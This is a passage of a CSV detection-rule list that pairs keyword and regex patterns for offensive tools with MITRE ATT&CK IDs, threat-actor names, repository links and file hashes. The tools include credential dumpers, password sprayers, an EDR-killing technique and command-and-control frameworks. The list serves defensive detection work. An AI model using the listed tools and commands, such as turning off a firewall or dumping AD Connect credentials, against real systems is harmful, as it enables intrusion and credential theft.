Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","33437" "*ADFSpoof-master*",".{0,1000}ADFSpoof\-master.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","33438" "*ADFSpray.csv*",".{0,1000}ADFSpray\.csv.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","33439" "*adfspray.git*",".{0,1000}adfspray\.git.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","33440" "*ADFSpray.py*",".{0,1000}ADFSpray\.py.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","33441" "*ADFSRelay -*",".{0,1000}ADFSRelay\s\-.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. 
ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","33442" "*ADFSRelay-main*",".{0,1000}ADFSRelay\-main.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","33443" "*ADHunt-main.zip*",".{0,1000}ADHunt\-main\.zip.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","33444" "*adidnsdump -u *",".{0,1000}adidnsdump\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33445" "*adidnsdump*",".{0,1000}adidnsdump.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","33446" "*ad-ldap-enum.py*",".{0,1000}ad\-ldap\-enum\.py.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","33449" "*ad-ldap-enum-main*",".{0,1000}ad\-ldap\-enum\-main.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","33450" "*adm|admin|root|sudo|wheel*",".{0,1000}adm\|admin\|root\|sudo\|wheel.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","33451" 
"*adm1nPanda/SharpExfil*",".{0,1000}adm1nPanda\/SharpExfil.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","1","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","33452" "*ADMIN$\\System32\\CodeIntegrity\\SiPolicy.p7b*",".{0,1000}ADMIN\$\\\\System32\\\\CodeIntegrity\\\\SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","33453" "*ADMIN$\System32\CodeIntegrity\SiPolicy.p7b*",".{0,1000}ADMIN\$\\System32\\CodeIntegrity\\SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","33454" "*Admin, your system has been hacked!*",".{0,1000}Admin,\syour\ssystem\shas\sbeen\shacked!.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33455" "*admin.kirbi*",".{0,1000}admin\.kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","33457" "*admin@cuba-supp.com*",".{0,1000}admin\@cuba\-supp\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33458" "*admin_can_be_delegated(self)*",".{0,1000}admin_can_be_delegated\(self\).{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","33460" "*admin_macos_x64 -rhost * -rport *",".{0,1000}admin_macos_x64\s\-rhost\s.{0,1000}\s\-rport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","33461" "*Admin2Sys.exe*",".{0,1000}Admin2Sys\.exe.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys is a C++ malware to escalate privileges from Administrator account to NT AUTHORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","N/A","10","1","54","19","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z","33463" "*Admin2Sys-main*",".{0,1000}Admin2Sys\-main.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys is a C++ malware to escalate privileges from Administrator account to NT AUTHORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","N/A","10","1","54","19","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z","33464" "*AD-miner -*",".{0,1000}AD\-miner\s\-.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 -
TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","33465" "*Adminisme/ServerScan/*",".{0,1000}Adminisme\/ServerScan\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","33466" "*Administrator privileges required to spoof 
processes*",".{0,1000}Administrator\sprivileges\srequired\sto\sspoof\sprocesses.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","33467" "*administrator@evilcorp.local*",".{0,1000}administrator\@evilcorp\.local.{0,1000}","offensive_tool_keyword","POC","PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855","T1078.001 - T1078.003 - T1078.004 - T1078 - T1189","TA0006 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sinsinology/CVE-2024-29855","1","0","N/A","N/A","10","1","17","7","2024-06-17T10:45:06Z","2024-06-13T08:32:55Z","33468" "*adnanekhan/Gato-X*",".{0,1000}adnanekhan\/Gato\-X.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","33469" "*adobe_top100_pass.txt*",".{0,1000}adobe_top100_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33470" "*AdPassHunt (PUA)*",".{0,1000}AdPassHunt\s\(PUA\).{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for FireEye's Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A","33471" "*ADPassHunt.exe*",".{0,1000}ADPassHunt\.exe.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for FireEye's Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33472" "*adsearch* --domain-admins*",".{0,1000}adsearch.{0,1000}\s\-\-domain\-admins.{0,1000}","offensive_tool_keyword","adsearch","A tool
to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33481" "*adsearch.exe*",".{0,1000}adsearch\.exe.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33482" "*ADSearch.exe*",".{0,1000}ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33483" "*ADSearch.sln*",".{0,1000}ADSearch\.sln.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33484" "*ADSearch\ADSearch.cs*",".{0,1000}ADSearch\\ADSearch\.cs.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33485" "*adsearch-master.zip",".{0,1000}adsearch\-master\.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","33486" "*ADSync passwords can be read or modified as local administrator only for ADSync version *",".{0,1000}ADSync\spasswords\scan\sbe\sread\sor\smodified\sas\slocal\sadministrator\sonly\sfor\sADSync\sversion\s.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","33487" "*ADSyncDecrypt.exe*",".{0,1000}ADSyncDecrypt\.exe.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33488" "*ADSyncDecrypt.exe*",".{0,1000}ADSyncDecrypt\.exe.{0,1000}","offensive_tool_keyword","ADSyncDecrypt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33489" "*ADSyncDecrypt.exe*",".{0,1000}ADSyncDecrypt\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33490" "*ADSyncGather.exe*",".{0,1000}ADSyncGather\.exe.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33491" "*ADSyncQuery*ADSync.mdf*.txt*",".{0,1000}ADSyncQuery.{0,1000}ADSync\.mdf.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","33492" "*Advanced.AV.Evasion.Tool.For.Red.Team.exe*",".{0,1000}Advanced\.AV\.Evasion\.Tool\.For\.Red\.Team\.exe.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","1","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","33499" "*Advanced-SQL-Injection-Cheatsheet*",".{0,1000}Advanced\-SQL\-Injection\-Cheatsheet.{0,1000}","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all types.","T1071.001 - T1190 - T1059.007 - T1040","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","N/A","10","3003","678","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z","33505" "*advantech_iview_networkservlet_cmd_inject.*",".{0,1000}advantech_iview_networkservlet_cmd_inject\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33506" "*Advfirewall set allprofiles state off*",".{0,1000}Advfirewall\sset\sallprofiles\sstate\soff.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","33507" "*adxcsouf2john.py*",".{0,1000}adxcsouf2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33510" "*ADZero.py*",".{0,1000}ADZero\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0001 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Privia-Security/ADZero","1","1","N/A","N/A","N/A","1","22","7","2020-10-02T13:00:21Z","2020-09-29T20:43:06Z","33511" 
"*ae04b0978a3e8179a0d2c1cd4a78fcb58fd1c3e8d5984ec1d8e9aa0881702676*",".{0,1000}ae04b0978a3e8179a0d2c1cd4a78fcb58fd1c3e8d5984ec1d8e9aa0881702676.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33512" "*ae094ee177fac926d832755352a3d0fff4804e513cefc430d5987936ff493b92*",".{0,1000}ae094ee177fac926d832755352a3d0fff4804e513cefc430d5987936ff493b92.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","33513" "*ae0c6e80d9f3f42919797ee71830ead3490530bdabc1baaa6e5990115bf54d16*",".{0,1000}ae0c6e80d9f3f42919797ee71830ead3490530bdabc1baaa6e5990115bf54d16.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33515" 
"*ae0d5b4ee3612accbbf88d53c4ae042ffcccca75a6ca0c8b352a3c7d7d2f34a5*",".{0,1000}ae0d5b4ee3612accbbf88d53c4ae042ffcccca75a6ca0c8b352a3c7d7d2f34a5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33516" "*ae0dcb27348bfae6db1ef03803f267b4c9729d8ff8c9eff70fcff5a3d4b10384*",".{0,1000}ae0dcb27348bfae6db1ef03803f267b4c9729d8ff8c9eff70fcff5a3d4b10384.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 